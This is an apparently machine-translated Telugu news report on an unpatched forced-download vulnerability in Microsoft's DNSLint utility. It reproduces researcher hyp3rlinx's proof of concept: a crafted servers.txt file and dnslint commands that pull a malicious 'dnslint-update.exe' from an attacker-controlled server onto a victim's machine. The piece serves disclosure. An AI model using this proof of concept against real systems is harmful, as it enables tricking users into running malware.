మైక్రోసాఫ్ట్ కార్పొరేషన్
మైక్రోసాఫ్ట్ DNSLint బ్రౌజర్ ద్వారా ప్రాప్యత చేయబడుతున్న వివిధ వెబ్ సర్వర్లకు కేటాయించిన IP చిరునామాలకు సంబంధించిన డొమైన్ నేమ్ సిస్టమ్ (DNS) పేరు శోధన సమస్యలను నిర్ధారించడానికి యుటిలిటీ పనిచేస్తుంది. ఇది ప్రాథమిక విండోస్ ప్యాకేజీలో భాగంగా చేర్చబడలేదు కాని మైక్రోసాఫ్ట్ వెబ్సైట్ నుండి ఉచితంగా డౌన్లోడ్ చేసుకోవచ్చు. రిమోట్ యాక్సెస్ దుర్బలత్వం 7.6 (క్లిష్టమైన) గ్రేడ్ చేయబడింది సివిఎస్ఎస్ 3.0 డౌన్లోడ్ల ద్వారా బలవంతంగా డ్రైవ్ చేయడానికి కారణమయ్యే ఈ యుటిలిటీని ప్రభావితం చేయడానికి స్కేల్ కనుగొనబడింది.
“/ Ql” స్విచ్ ప్రకారం DNS పరీక్ష-ఫైళ్ళను అన్వయించేటప్పుడు DNSLint డొమైన్ పేర్లను సమీక్షించదు కాబట్టి ఈ దుర్బలత్వం పెరుగుతుంది. సాధారణంగా ntic హించిన డొమైన్ పేరు సమాచారానికి విరుద్ధంగా స్క్రిప్ట్ లేదా బైనరీ కోడ్ను కలిగి ఉన్న అటువంటి ఫైల్ను తుది వినియోగదారు నిర్వహిస్తే, బలవంతపు డౌన్లోడ్లను స్థాపించడం సులభం అయినప్పుడు సిస్టమ్ను ప్రమాదంలో పడవచ్చు. ఇది సంభవించిన సందర్భంలో, వెబ్ బ్రౌజర్ ద్వారా ప్రాప్యత చేసినప్పుడు రిమోట్ ఆదేశాలను డౌన్లోడ్ చేసి అమలు చేయగల హానికరమైన ఫైల్ను బలవంతంగా డౌన్లోడ్ చేయడానికి హ్యాకర్ ఒత్తిడి చేయవచ్చు. డౌన్లోడ్ స్థానిక సిస్టమ్ స్థానానికి సేవ్ అవుతుంది మరియు భద్రతా ప్రాప్యతను ప్రాంప్ట్ చేస్తుంది మరియు, డిస్క్ డ్రైవ్లో తెలిసిన ప్రదేశం నుండి ఫైల్ వచ్చిందని చూస్తే, ఎక్జిక్యూటబుల్ను ముందుకు తీసుకెళ్లడానికి వినియోగదారుని అనుమతించవచ్చు. హానికరమైన ఫైల్కు ప్రత్యేక హక్కు లభించిన తర్వాత, అది ఏదైనా ఉద్దేశించిన కోడ్ను రిమోట్గా అమలు చేస్తుంది మరియు వినియోగదారు యొక్క భద్రత మరియు గోప్యతను రాజీ చేస్తుంది.
యొక్క జాన్ పేజ్ hyp3rlinx డొమైన్ పేరుకు విరుద్ధంగా స్క్రిప్ట్ లేదా బైనరీ రిఫరెన్స్ టెక్స్ట్-ఫైల్ ఉపయోగించినప్పుడు, ఈ దుర్బలత్వాన్ని అనుకరించే భావన యొక్క రుజువును వ్రాసింది, ఈ క్రింది విధంగా అనుకోని ఫైల్ డౌన్లోడ్ చేయగలదని వివరిస్తుంది:
dnslint.exe / v / y / d “MALWARE-FILE” / s X.X.X.X / r “myreport”
DNSLint యుటిలిటీ సందర్భంలో, సిస్టమ్లో మాల్వేర్లను ప్రవేశపెట్టడానికి దుర్బలత్వాన్ని ఎలా ఉపయోగించుకోవాలో ఈ క్రిందివి చూపుతాయి.
1) రిమోట్ వెబ్ సర్వర్ రూట్లో “dnslint-update.exe”.
2) “servers.txt”
DNSLint
; ఇది నమూనా DNSLint ఇన్పుట్ ఫైల్
+ ఈ DNS సర్వర్ అంటారు: dns1.cp.msft.net
[dns ~ సర్వర్] X.X.X.X
, a, r; ఒక రికార్డ్
X.X.X.X, ptr, r; PTR రికార్డు
test1, cname, r; CNAME రికార్డ్
test2, mx, r; MX రికార్డ్
3) dnslint.exe / ql servers.txt
పైన పేర్కొన్న విధంగా పైన పేర్కొన్న కోడ్ సవరించబడలేదు హక్కులు ఈ కంటెంట్కు hyp3rlinx. ఈ దుర్బలత్వాన్ని బహిర్గతం చేస్తే, ఈ సమస్యను ఇంకా పరిష్కరించడానికి ప్యాచ్ నవీకరణ ఉన్నట్లు అనిపించదు. ఈ దుర్బలత్వానికి సివిఇ కోడ్ ఇంకా కేటాయించవలసి ఉంది మరియు ఈ విషయంపై మైక్రోసాఫ్ట్ తన అధికారిక భద్రతా బులెటిన్లో ఐడి చేసి వ్రాయాలి.